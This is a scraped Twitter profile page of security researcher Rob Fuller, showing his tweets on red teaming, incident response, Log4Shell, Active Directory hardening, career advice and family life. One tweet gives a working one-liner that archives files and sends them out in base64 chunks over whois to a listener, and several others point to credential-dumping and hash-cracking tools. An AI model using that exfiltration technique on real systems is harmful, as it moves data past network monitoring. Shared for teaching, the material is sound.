Pikagi
Rob Fuller Profile Banner
Rob Fuller Profile
Rob Fuller

@mubix

81,350
Followers
26,228
Following
1,990
Media
33,228
Statuses

Dad / Husband / Marine / Student / Teacher / IAM, Red Team, CTI Director / @Hak5 / @NoVAHackers / @SiliconHBO / @NationalCCDC / @MARFORCYBER Auxiliary

The Internet
https://t.co/7vtraovBpp
Joined February 2007
Don't wanna be here? Send us removal request.
Pinned Tweet
@mubix
Rob Fuller
@mubix
6 years
If you have ever learned anything from me at all. I challenge you to pay it forward. I didnโ€™t get to where I am by standing on the shoulders of giants, I got here by learning tidbits from hundreds of tweeters, bloggers, podcasters & presenters who chose to share their knowledge.
59
210
1K
Last Seen Profiles
Iylah Enloe

@iy_enl

jilbab cts

@udin12344566

Eric Moran ๐Ÿˆ

@CoachE_Philly

๐Ÿ’™๐ŸฆŠโค่Šฑๅ’ฒๆ„›่Ž‰๐Ÿ’™๐ŸฆŠโคVtuber ใƒขใƒณใƒใƒณใ€€TRPGใ€€ๅฅฝใ

@IRe_airi

janda ndeso ๐Ÿ’‹

@janda_ndeso

๐Ÿ‘ ๐Ÿ‘ ๐Ÿ‘ ๐Ÿ€

@SanntyAguirree_

janda ndeso ๐Ÿ’‹

@janda_ndeso

shadowdog

@shadowd06279368

Tante Cindy

@jandakembangstw

janda ndeso ๐Ÿ’‹

@janda_ndeso

Tom and Mat Attack

@TMACast

Natalia Bellville

@BellvillNatali

์Œˆ์ˆ™..

@3amsook

PlayBoรฏรฏTrell๐Ÿ‡๐Ÿ•บ๐Ÿพ

@W19Latrell

Mario Navarro

@Mario17N

STW GEMOY SEMOK

@stwgemoy

Claire Annesley

@ClaireAnnesley

Joseph Milano

@jmilano24

A. Z. Fell & Co.

@Mr_AZ_Fell

Joe Kearns

@joe00381597

pecinta IBU2, STW, BINOR & JANDA

@stw_pdg

STW .. Aku Cinta Kau ๐Ÿฅฐ

@pengen_stw

janda ndeso ๐Ÿ’‹

@janda_ndeso

Wolau

@WolauLYi

ะ’ะšะพะฝั‚ะฐะบั‚ะต

@vkontakte

PAP MANTAN

@papmantan69_

Baine Bloodhoof ๐Ÿ‚

@SonOfCairne

ใ‚

@ezo0l

Cรด Hai

@MyMy41627822

CoralWarner

@9rlgEDpd8mWlFB

ู‹shun.๐Ÿ•ฏ๏ธ

@viasyals

์‹ฌ์‹ฌํ• ๋•Œ ๋ง๊ฑฐ๋Š” ๊ณ„์ •์ด ์ •์ฒด์„ฑ

@ssamja5678

Pemuas Emak2 STW

@stwmaniax

rawan ๐Ÿค

@wannsato

Lenny Rabbits

@lenny_rabbits

A

@LivCha20

@mubix
Rob Fuller
@mubix
6 years
"I'm sorry to bother you, but your CPU is hotter than the surface of the sun. This may shorten your CPU's lifespan if this continues -- Windows 10" - (source: )
Tweet media one
38
935
2K
@mubix
Rob Fuller
@mubix
3 years
Diagrams for the #Log4j #Log4Shell that can help people discuss things. Hope this helps...
Tweet media one
Tweet media two
Tweet media three
Tweet media four
23
763
2K
@mubix
Rob Fuller
@mubix
5 years
Thanks to @dildog for the idea. Very happy with my new keychain ;)
Tweet media one
105
291
2K
@mubix
Rob Fuller
@mubix
6 years
Dear %Companies%, A single security minded Sys Admin is worth more than a handful of pentesters. Please start investing in the admins you already have. I say this as a pentester who has seen the impact that an empowered admin can have.
44
755
2K
@mubix
Rob Fuller
@mubix
4 years
I want to make something very clear to the #infosec community. Just because you aren't deeply technical, a pentester, a red teamer, a forensics expert, or RE wiz doesn't mean that you can't teach people things. Everyone's life experiences are different and the more we 1/4
38
427
2K
@mubix
Rob Fuller
@mubix
5 years
First: ncat -k -l -p 4444 | tee files.b64 (tee to a file so you can make sure you have it) Next: tar czf - /bin/* | base64 | xargs -I bits timeout 0.03 whois -h 192.168.80.107 -p 4444 bits Finally: cat files.b64 | tr -d '\r\n' | base64 -d | tar zxv (to get the files out)
11
516
1K
@mubix
Rob Fuller
@mubix
4 years
Just watched the lady in front of me at the DMV give a USB stick to the clerk and say that all of her proofs of ID were โ€œdigitalโ€. The clerk proceeded to plug in the USB and copy the files to his desktop, then open them. 1st) Iโ€™m curious if she is in the job market. 2nd)
78
302
1K
@mubix
Rob Fuller
@mubix
5 years
My kids and their friends are having a LAN party and they think Iโ€™m totally weird for calling it that... but they are all playing the same game, on their own computers, in the same room in which most do not live. == LAN party yes?
107
106
1K
@mubix
Rob Fuller
@mubix
5 years
Iโ€™m done.
Tweet media one
140
20
1K
@mubix
Rob Fuller
@mubix
4 years
Today I joined the @BHinfoSecurity security team! Super excited to join this League of Extraordinary Hackers. Thanks to everyone who reached out and sent DMs about positions.
Tweet media one
155
47
1K
@mubix
Rob Fuller
@mubix
3 years
My father passed away due to Covid related complications. Iโ€™m home from emergency leave. Iโ€™m done with this conversation.
459
25
1K
@mubix
Rob Fuller
@mubix
5 years
Hey @defcon - what about T-shirts or Hoodies with these QR codes on them. One says "DO NOT TAKE PHOTOS AT DEF CON" the other says "I DO NOT CONSENT TO THIS PHOTO OR VIDEO". Which due to the camera apps auto reading QR codes should pop up this message if you happen to be in-frame.
Tweet media one
Tweet media two
44
198
1K
@mubix
Rob Fuller
@mubix
5 years
Just tried this out and it works! Next time you get a vendor email, reply with this: (code here: ) with a subject line of "Mail Delivery Subsystem - Address Not Found" (make sure to clear out the "RE:" and other subject line :)
14
284
992
@mubix
Rob Fuller
@mubix
7 years
ATM card PIN code bypass - request for CVE ;) (my kids first 0day)
26
270
947
@mubix
Rob Fuller
@mubix
6 years
is back online. It's an egress testing tool that you can hit via UDP, HTTP, HTTPS, or SSH on any port via IPv6 or IPv4 and you will always get back `w00tw00t` for verifiable responses.
15
408
922
@mubix
Rob Fuller
@mubix
3 years
10 #Log4Shell Facts vs Fiction: a ๐Ÿงต 1. 1.x is NOT vuln to this RCE. While it doesn't have another RCE, it requires access to send serialized data to a listener ON the log server. This is much MUCH harder to exploit and kind of rare for a Log4j server to be running.
12
335
932
@mubix
Rob Fuller
@mubix
3 years
One of my favorite interview questions is asking someone what they believe the top 10 security issues companies have today. You will know exactly how much experience, forethought, maturity, and technical skill someone has just from that one question.
60
96
887
@mubix
Rob Fuller
@mubix
4 years
To all looking into the SolarWinds Orion breach: Orion holds credentials, such as Domain Admin, Cisco/Router/SW root/enable creds, ESXi/vCenter Credentials, AWS/Azure/Cloud root API keys. and so much more. CONSIDER THESE CREDENTIALS COMPROMISED if you see other IOCs #SunBurst
26
328
794
@mubix
Rob Fuller
@mubix
4 years
Today was my last day of work at Cruise :( . Iโ€™m part of a lay-off :/ So yah... looking for work. I know the US is at a crazy unemployment rate and probably very few are hiring but if you know of anywhere looking to add to their internal red team, security trainer, SMB CTO/CISO/
131
560
735
@mubix
Rob Fuller
@mubix
5 years
If you run a CTF and one of your challenges is a zoomed out fuzzy picture of 4000 lines of Base64 in the Wing Dings font, you are a monster and should feel bad about yourself.
Tweet media one
31
122
730
@mubix
Rob Fuller
@mubix
6 years
Your biggest obstacle in this world is yourself. Self doubt is beaten by ignoring it. Itโ€™s dumb and useless. You are amazing and can do anything you let yourself achieve. I believe in you.
19
207
722
@mubix
Rob Fuller
@mubix
3 years
#infosec career advice. If all you ever do is fight fires all day, the best you can ever hope to learn is to be more efficient at fighting fires. You will never learn new ways to fight fires. Always schedule time for yourself during your day to just learn. #alwaysbelearning
17
153
703
@mubix
Rob Fuller
@mubix
7 years
My Metasploitable 3 CTF Start to Finish walk-through of all the challenges including CTF setup/prep, and alternative solutions: (Now downloadable/printable/copy allowed)
Tweet card media
Metasploitable 3 - A Walk-through: Linux Edition

Metasploitable 3 A Walk-through: Linux Edition SPOILERS! To the prospective reader: In case you donโ€™t fully realize what it is you are opening, this is a complete, step-by-step, walkthrough from the...

docs.google.com
20
373
695
@mubix
Rob Fuller
@mubix
3 years
This is my dad at my graduation in 2019. I spent a lifetime trying to make him proud enough.
Tweet media one
40
11
684
@mubix
Rob Fuller
@mubix
3 years
Cracking NetNTLMv1/v2 using NTLM hashes w/ Hashcat - this is epic! > If you have a ton of NTLM hashes lying around, even if they aren't cracked, this could make them useable much quicker than trying to crack them to clear text.
Tweet card media
Cracking NetNTLMv1/v2 using NT hashes by cablethief ยท Pull Request #2607 ยท hashcat/hashcat

Given the ability to PTH with NT hashes as well as the availability of hash sources such as https://haveibeenpwned.com/Passwords where all passwords might not be cracked for wordlists, the ability ...

github.com
12
254
686
@mubix
Rob Fuller
@mubix
4 years
The biggest career advice I can give anyone in Infosec is to document/brag about your successes. I feel safe in saying that any manager I have had would vouch for the fact that you have to usually pry it out of me. Which isnโ€™t humble, itโ€™s stupid. [1/2]
34
85
668
@mubix
Rob Fuller
@mubix
2 years
Posted my "Practical Cryptography for Infosec Noobs" slides for @shmoocon 2022 here: I know I went fast so here are all of the slides so that you can get each of the links and details.
Tweet media one
7
138
667
@mubix
Rob Fuller
@mubix
7 months
Broadcom CEO telling VMware folks to return to the offices โ€œor elseโ€ is not gonna end well. If you are a VMware shop, are yโ€™all worried at all or just expecting to roll through?
72
71
670
@mubix
Rob Fuller
@mubix
5 years
Learned something new today. If you decrease the WiFi power so it doesnโ€™t extend as far, magically your kids come out of their rooms in search of better signal...
20
91
665
@mubix
Rob Fuller
@mubix
8 years
Watching password cracking tools work:
7
363
631
@mubix
Rob Fuller
@mubix
4 years
#UnpopularOpinion I don't believe that anyone's first career should be pentester or red teamer. Ethics, maturity, empathy and technical practice are all things I feel are base requirements for the job and aren't things you can have in your first few years of working in IT/Sec
48
75
625
@mubix
Rob Fuller
@mubix
3 years
Hi. Iโ€™m hiring for my team. 3 spots open, not all of the requirements are requirements. Flexible on the Senior part too. What Iโ€™m looking for is the stuff I canโ€™t teach. Drive, empathy, and the ability to learn quickly and dig deep.
64
269
624
@mubix
Rob Fuller
@mubix
3 years
Itโ€™s easy to poke fun, but we were all there at one point, albeit swapping Kali for BackTrack or Auditor or Nmap evenโ€ฆ
@realcyberpanda
Cyber Panda ๐Ÿผ
@realcyberpanda
3 years
Every #hacker ever:
Tweet media one
60
243
2K
45
55
613
@mubix
Rob Fuller
@mubix
2 years
I feel that I am better at red teaming because I was a SOC Analyst, I was tech support, I was help desk, I was a sys admin. More than any college degree or certification, or technical knowledge I have, empathy and knowing how things work has made me a better tester.
24
55
613
@mubix
Rob Fuller
@mubix
3 years
If you haven't yet, as soon as possible run the following command on ALL of your AD CAs: certutil.exe -setreg CA\AuditFilter 127 This will enable all of the logging you will need to catch many of the attacks detailed in @harmj0y @tifkin_ 's awesome work
Tweet media one
6
191
594
@mubix
Rob Fuller
@mubix
6 years
This is my friendly reminder that you are not alone and you are awesome. If you can see this then you have my permission to contact me to talk about whatever you need to, whenever you need to.
25
86
590
@mubix
Rob Fuller
@mubix
3 years
If you have LDAP servers inside your network, or trust external 3rd-party ones, and either of them allow the schema attributes javaClassName, javaCodeBase or javaSerializedObject as writable, you should be making sure attackers aren't using them for #Log4j #Log4Shell
Tweet media one
6
190
583
@mubix
Rob Fuller
@mubix
2 years
Finally decided to post 10+ years worth of notes on using ldapsearch - it references great work from @ropnop @agsolino @harmj0y and @YuG0rd
LDAPSearch Reference

ldapsearch is a extremely powerful tool, especially for Windows Active Directory enumeration. Itโ€™s one of my primary tools when performing pentesting or red teaming against an environment with Active...

malicious.link
10
230
582
@mubix
Rob Fuller
@mubix
3 years
A home lab is not a requirement to getting a job in Infosec. Spending money on something like that is an investment in you learning technical skills, but so is a cloud account with free credits and @hackthebox_eu and @RealTryHackMe and a hundred different resources. 1/2
14
118
573
@mubix
Rob Fuller
@mubix
5 years
I really want to send this to every client that ever put โ€œallowed testing hoursโ€ requirements on a pen test / red team assessment
@UncleDuke1969
Uncle Duke
@UncleDuke1969
5 years
*checks watch* *pulls off ski mask* "Shit."
Tweet media one
53
1K
4K
17
148
560
@mubix
Rob Fuller
@mubix
8 years
{blog} Snagging creds from locked machines -
Snagging creds from locked machines

First off, this is dead simple and shouldnโ€™t work, but it does. Also, there is no possible way that Iโ€™m the first one that has identified this, but here it is (trust me, I tested it so many ways to...

room362.com
36
492
549
@mubix
Rob Fuller
@mubix
6 years
Ladies and Gents, my life goal is to graduate from @wgu by the end of this year. To do that Iโ€™m going on hiatus. No games, or social media. No streams or TV shows. The next post you see from me should only be two words. โ€œIโ€™m doneโ€. See you soon.
70
11
532
@mubix
Rob Fuller
@mubix
3 years
One of the smallest changes with huge effect you can make to Active Directory to help secure it against a LOT of attack paths is changing the attribute ms-DS-MachineAccountQuota = 0. Do this now, do it on Monday, but adds a pretty decent barrier to many attack paths.
10
143
525
@mubix
Rob Fuller
@mubix
3 months
Nerd Psychopathy Test: (what do you enter into the following dialog box?)
Tweet media one
371
40
528
@mubix
Rob Fuller
@mubix
4 years
Please make sure to patch your Windows systems. CVE-2020-16938 is no joke. Hard Drive encryption does break this attack, however, most servers and virtual machines don't have HDD encryption enabled. Patch! #ntdsdit op: @jonasLyk
Tweet media one
5
232
508
@mubix
Rob Fuller
@mubix
5 years
3 OSCP Vouchers up for grabs. Here is how to get them: cc: @nickadam @aerundel @cyanide_m @DissectMalware @SuperNerdDace @ericazeli @Ch33r10 @theRealFr13nd @bobthehackr @NecoleStephen @rana__khalil @FelixAtter @ShadowBroker218 @danakdev @JoshGatka (Plz RT)
Tweet card media
OSCP Voucher Give Away

OSCP Voucher Give Away. GitHub Gist: instantly share code, notes, and snippets.

gist.github.com
36
376
516
@mubix
Rob Fuller
@mubix
2 years
This is awesome!
@LetsDefendIO
LetsDefend
@LetsDefendIO
2 years
Windows security log quick reference for SOC Analysts #CyberSecurity
Tweet media one
13
629
2K
4
118
483
@mubix
Rob Fuller
@mubix
1 year
Releasing a NFS Client today, it's written in Go, has file list, upload, download, delete, make directory and delete directory functions without having to mount the drive or permissions (locally) to do so. This can be super helpful from a Win host.
Tweet card media
GitHub - mubix/nfsclient: NFS client written in Go

NFS client written in Go. Contribute to mubix/nfsclient development by creating an account on GitHub.

github.com
12
141
485
@mubix
Rob Fuller
@mubix
3 years
When the Red Team gets sent phishing emails by the Security Awareness team...
15
63
479
@mubix
Rob Fuller
@mubix
3 years
80% of pentest firms/redteams that I've been a part of don't have operational documentation even close to what was posted of the google translated Conti playbook. I'm part of that problem so lets all #DoBetter #BeBetter #DocumentBetter
Tweet media one
12
84
481
@mubix
Rob Fuller
@mubix
3 years
This is year 2 of holidays during a pandemic. My DMs are open and I am here if you just want to talk to someone and not feel alone. I am here if you need to scream and yell and tell someone that it hurts. I am here. You are not alone.
27
54
478
@mubix
Rob Fuller
@mubix
4 years
to be a hacker. My call to action is this; I would like to see more people submitting talks. Screw what CFP boards think of your talk. They make decisions based on what they want their conference to be, not how good your talk is. You are amazing & I want to hear every word. #Love
14
42
467
@mubix
Rob Fuller
@mubix
4 years
Thanks for all the support, I will respond to messages. I had a 48 hour exam this weekend so I disconnected, focused on family, the exam and getting my head right. On a positive note; I passed the Red Team Operator exam! by @zeropointsecltd @_RastaMouse
Tweet media one
26
22
468
@mubix
Rob Fuller
@mubix
5 years
Post-Pentest Depression is where you start doubting all of the things you did and slapping your self for all the mistakes you made, or things you forgot to check. Am I alone in this or anyone else get this?
57
57
463
@mubix
Rob Fuller
@mubix
6 years
Coolest birthday cake ever!
Tweet media one
49
13
437
@mubix
Rob Fuller
@mubix
3 years
Friendly reminder to not copy and paste random strings into a shell from the Internet and especially Twitter and ESPECIALLY on to production servers to โ€œsearch for vulnerable Log4jโ€
9
65
442
@mubix
Rob Fuller
@mubix
6 years
You know you're getting old when you google for a technique that you want to do on a test and the top result is your own blog... #LosingMyMind
22
62
440
@mubix
Rob Fuller
@mubix
5 years
If you pentest, red team or defend windows environments, this should be required reading. Wish I was in the room when this talk was presented. Please @hackinparis release this video ASAP. :)
@decoder_it
ap
@decoder_it
5 years
Just uploaded the pdf slides of my talk "whoami /priv" @hackinparis #HIP19
9
269
693
6
139
434
@mubix
Rob Fuller
@mubix
7 years
#HackingTogether -
27
223
423
@mubix
Rob Fuller
@mubix
2 years
#IncidentResponse challenge: Here is a spam email that made it through Google's spam filter. Which of the headers are actually real and which ones are fake? Can you spot the cool trick that this spammer is using?
Tweet media one
28
86
429
@mubix
Rob Fuller
@mubix
4 years
What is your favorite InfoSec related discord server? (*Invite links or website links are welcome)
41
64
415
@mubix
Rob Fuller
@mubix
3 years
I can't tell you how much time this has saved me since I set this up. Thanks again @dildog
@mubix
Rob Fuller
@mubix
5 years
Thanks to @dildog for the idea. Very happy with my new keychain ;)
Tweet media one
105
291
2K
27
32
422
@mubix
Rob Fuller
@mubix
4 years
Cool powershell trick I learned today: " gci C:\users\*\* " lets you know which user's home directories you have access to and whats in the first level.
6
76
395
@mubix
Rob Fuller
@mubix
3 years
Hacking has officially jumped the sharkโ€ฆ
Tweet media one
24
33
375
@mubix
Rob Fuller
@mubix
2 years
Advanced Red Team EDR evasion technique: 1. Donโ€™t run your malware on a box that is monitored by EDR. 2. Tunnel all of your other attacks through the box without EDR 3. Gain access to everything via weak IAM controls (Active Directory) 4. End engagement Did I miss anything?
18
65
382
@mubix
Rob Fuller
@mubix
6 years
Dear Pentesters, don't be lazy/sloppy and leave files, registry keys, cron jobs everywhere. Do your best to clean up everything you put down. #ZeroContextTweets
15
108
386
@mubix
Rob Fuller
@mubix
6 years
#DEFCON26 #BlackHat2018 #BSidesLV advice: just because they are on stage or in front of the class doesnโ€™t mean they know what they are talking about. Challenge everything, test it yourself. This however doesnโ€™t give you the right to treat anyone as less than respectful. They 1/n
10
87
371
@mubix
Rob Fuller
@mubix
7 years
Executive order #Metasploit - #Meterpreter
Tweet media one
7
215
353
@mubix
Rob Fuller
@mubix
3 months
Anyone know a good way to help a neurotypical person understand executive disfunction? Just saying โ€œitโ€™s like you want to do something but you canโ€™tโ€ isnโ€™t really landing.
83
28
359
@mubix
Rob Fuller
@mubix
4 years
To all. If you ever find yourself in a situation at a conference or place Iโ€™m at and need me to call you or pick you out of that situation. DM me for phone number so that you have it and can use it in that situation. I will show up.
22
32
354
@mubix
Rob Fuller
@mubix
3 years
To all of you working on #log4j today, a Friday, you are appreciated. You are awesome. Thank you for doing the work that needs to get done when it counts. Security is often a thankless job. So thank you for today.
8
66
348
@mubix
Rob Fuller
@mubix
6 years
Played a bit with @CertSG 's FIR project (Fast Incident Response). Took me about 40 minutes to get set up and it's a fully functional Incident Response tracking platform w/ metrics! + right price: FREE ;-)
GitHub - certsocietegenerale/FIR: Fast Incident Response

Fast Incident Response. Contribute to certsocietegenerale/FIR development by creating an account on GitHub.

github.com
8
123
343
@mubix
Rob Fuller
@mubix
7 years
Please randomize your root password on OSX! You don't need it. (cc @SteveD3 ): cat /dev/urandom | env LC_CTYPE=C tr -dc a-zA-Z0-9 | head -c 60; echo | xargs -I rootpw sudo dscl . -passwd /Users/root rootpw
12
215
332
@mubix
Rob Fuller
@mubix
3 years
Today a student of mine couldnโ€™t find the desktop of a user on the Windows XP box he exploited because it didnโ€™t have a C:\Users directory. I felt sooooo oldโ€ฆ
26
28
341
@mubix
Rob Fuller
@mubix
7 years
This is a blog post that ALL pentesters/red teamers should save in their favorite offline knowledge base (evernote, keep, wiki, etc). Do it now, future you will thank me.. or more correctly Damien King (the author). Seniors: go stuff this down your junior tester's throats ASAP
6
169
337
@mubix
Rob Fuller
@mubix
4 years
I have grown to love TMUX but it's ability to log console output is atrocious vs SCREEN. Here are my two setup guides for myself. Screen logs ALL sessions automatically, and even through the PIA setup for TMUX you still have to enable it every single time....
Tweet media one
Tweet media two
17
95
338
@mubix
Rob Fuller
@mubix
5 months
โ€œItโ€™s almost like people are making more money teaching hacking than actually doing it.โ€ -- @assume_breach ^ 100% true statement, and most don't teach good habits, they teach run and gun cowboy BS.
Tweet card media
Iโ€™m Not A Pentester (And You Might Not Want To Be One Either)

Hi all! So, this is going to be a different type of post. Iโ€™ve tried to stay a little off the radar personally with my blogs and Twitter account for a lot of reasons. Itโ€™s not hard to find out who Iโ€ฆ

link.medium.com
13
80
331
@mubix
Rob Fuller
@mubix
5 years
I wish certifications didn't have arbitrary expiration dates, but instead had big, bold "issued on" dates. That way certification companies couldn't milk you for "CPE"s (which for some reason you can "pay" for..) & hiring companies could see when you had that knowledge. Thoughts?
54
40
321
@mubix
Rob Fuller
@mubix
3 years
This tweet didn't age well. It was short sighted. For me, since people's decision to not get vaccinated has resulted in my father being hospitalized and my son possibly infected too... Go get the shot or stay home. Stop hurting other people. I'm tired. :(
@mubix
Rob Fuller
@mubix
3 years
I'm vaccinated. I think it's a good idea to do so and hope that others also get vaccinated. Obviously you can do what you wish, but whatever your decision is, I hope that you stay healthy and live a long life doing whatever you love doing for as long as possible.
3
6
79
32
38
318
@mubix
Rob Fuller
@mubix
6 years
If I was in charge of an entire companyโ€™s security this first large projects I would focus on is (in no particular order) - asset management (can you tell me what this IP on your network is and does within 10 minutes)
13
94
312
@mubix
Rob Fuller
@mubix
6 years
Dear CTF challenge creators. If I have to guess a password, URL, hostname etc and itโ€™s not either in rockyou, dirbuster or other standard word list, you should confirm that itโ€™s in fact guessable in a short period of time by having a friend attempt it.
24
51
310
@mubix
Rob Fuller
@mubix
3 years
If you are on a Blue Team, or IT Team, and you aren't running BloodHound REGULARLY, you are doing yourself a disservice. As a CTO I would either get rid of AD, or have BloodHound statistics be a top KPI/OKR for my org.
16
63
311
@mubix
Rob Fuller
@mubix
7 years
ATM repair guy at my local gas station fixed the machine wirelessly. It even unlocked with a button on his tablet.
13
142
294
@mubix
Rob Fuller
@mubix
6 years
Boom! Iโ€™m a 81% (passed is all that really matters) new Encryption Specialist. I can help you with all your ROT13 needs ;)
30
20
301
@mubix
Rob Fuller
@mubix
4 years
Pentesters / Red Teamers - What is in your virtual EDC (every-day-carry) backpack of tools? What's your most commonly used Github/Gitlab repositories?
12
68
305
@mubix
Rob Fuller
@mubix
4 years
I've released a tool that can help you audit the exposure the SolarWinds Orion box poses to the rest of your network. The code is open source:
SolarFlare Release: Password Dumper for SolarWinds Orion

TL;DR Here are the concerns I have regarding the SolarWinds/FireEye breach: The accounts stored in an organizationโ€™s SolarWinds Orion may be underestimated. I recently did a pentest for a firm that...

malicious.link
6
141
303
@mubix
Rob Fuller
@mubix
3 years
I never realized how strong the rainbow had become as a symbol. โ€˜been wearing a rainbow ๐ŸŒˆ mask around recently in public & itโ€™s been a small glimpse into the hate/disgust thrown at ๐Ÿณ๏ธโ€โšง๏ธ LGBTQ+ peeps. I now need LOTS more rainbow gear. Iโ€™m all about making bigots uncomfortable :)
15
15
305
@mubix
Rob Fuller
@mubix
6 years
Would you like to be a Certified Checkbox Unchecker as well? Now it's easy to get your CCU certification, sign up here: - It's the same esteemed certification body I received mine from: (Takes about an hour to process)
Tweet media one
24
91
296
@mubix
Rob Fuller
@mubix
6 years
I found a wandering @BillMurray with @syngularity0 at @kiwicon โ€ฆ
Tweet media one
24
27
292
@mubix
Rob Fuller
@mubix
3 years
Anyone need to upgrade their internet speeds? I donโ€™t need it anymore.
Tweet media one
36
4
293
@mubix
Rob Fuller
@mubix
4 years
haven't seen or done personally. There is a lot of bravado out there. Many people speak on popping shells & APT like they are experts, that aren't, but when you share experience, real experience, we all get better. Shared knowledge, infinite curiosity, this is what it means 3/4
1
21
289
@mubix
Rob Fuller
@mubix
3 years
IT levels based on job requirements:
Tweet media one
15
41
289
@mubix
Rob Fuller
@mubix
4 years
Public Service Announcement: Excel is NOT a good password manager.
41
63
285
@mubix
Rob Fuller
@mubix
7 years
Dear 185.56.82.22 - brute forcing my Internet SMB server won't get you much, but thanks for the user/wordlist!
Tweet card media
Brute forcing on my SMB server

Brute forcing on my SMB server. GitHub Gist: instantly share code, notes, and snippets.

gist.github.com
8
85
278
@mubix
Rob Fuller
@mubix
6 years
So this just happened....
Tweet media one
10
64
274
@mubix
Rob Fuller
@mubix
10 months
*IT* *IS* *NOT* *โ€USERSโ€* *JOB* *TO* *KNOW* *SECURITY* *BEST* *PRACTICES*โ€ฆ we all need to do better at earning our paychecks and make it so they can do their jobโ€™s securely (the ones they are paid to do) without having to think about it. #TheHillIllDieOn
16
51
281
@mubix
Rob Fuller
@mubix
4 years
You have my singular and undivided attention. You sent my son home on the day they were passing valentines around in class and he came home in tears... because your predudices made you think my Asian child had the corona virus. I hope you feel the vibrations of my rage.
46
10
278
@mubix
Rob Fuller
@mubix
7 years
Getting Hired Tips: 1) don't post obvious CFAA violations to social media
10
89
273
@mubix
Rob Fuller
@mubix
1 year
For those that haven't played with smbcrawler by @mr_mitm - You should give it a shot, it's really well done:
Tweet card media
GitHub - SySS-Research/smbcrawler: smbcrawler is no-nonsense tool that takes credentials and a list...

smbcrawler is no-nonsense tool that takes credentials and a list of hosts and 'crawls' (or 'spiders') through those shares - SySS-Research/smbcrawler

github.com
3
78
273